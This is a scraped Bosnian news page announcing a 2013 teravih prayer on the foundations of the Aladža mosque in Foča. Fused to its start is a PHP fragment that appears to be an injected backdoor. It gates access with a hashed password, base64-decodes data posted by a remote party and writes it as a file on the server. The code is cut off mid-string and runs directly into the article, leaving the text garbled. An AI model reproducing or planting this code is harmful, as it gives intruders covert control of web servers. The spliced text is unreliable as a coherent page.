function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Teravih namaz na temeljima Aladža džamije u Foči - Medžlis Islamske zajednice Bijeljina

Teravih namaz na temeljima Aladža džamije u Foči

Teravih namaz na temeljima Aladža džamije u Foči

Rijaset Islamske zajednice u Bosni i Hercegovini na svojoj devetoj redovnoj sjednici, održanoj u Sarajevu 18. januara 2013. godine, donio je zaključak kojim Rijaset Islamske zajednice u Bosni i Hercegovini proglašava 2013. godinu godinom intenzivnih aktivnosti na pripremi i otpočinjanju radova na obnovi Aladža džamije u Foči.

Na temelju navedenog zaključka, Rijaset Islamske zajednice u Bosni i Hercegovini u saradnji sa Muftijstvom goraždanskim i muftijom goraždanskim Hamed ef. Efendićem u toku 2013. godine realizira više aktivnosti i programskih sadržaja kako bi se tokom cijele 2013. godine unutar Islamske i šire društvene zajednice držalo u fokusu važnost mobilizacije svih raspoloživih resursa za obnovu Aladža džamije, upoznalo najširu javnost sa znamenitošću kulturno-historijskog spomenika izvanredne arhitektonske ljepote Aladža džamije, jačalo svijest i identifikaciju muslimana u Bosni i Hercegovini i dijaspori s Aladžom te istaknulo njen značaj kao simbola islama i muslimana u Foči i Podrinju, što bi moglo ohrabriti Fočake da se vraćaju na svoja prijeratna ognjišta i snaže vezu sa rodnim krajem.

U okviru planiranih aktivnosti u nedjelju, 04. augusta 2013. godine, na temeljima Aladža džamije u Foči klanja prvi zajednički jacija i teravih namaz nakon 1992.godine. Očekuje se prisustvo većeg broja džematlija i zvanica. Ovom jacija i teravih namazu prisustvovat će, kako je najavljeno, i reisu-l-ulema Islamske zajednice u Bosni i Hercegovini Husein ef. Kavazović i neposredno pred namaz uputiti poruku o obnovi Aladža džamije.

Dženan Imamović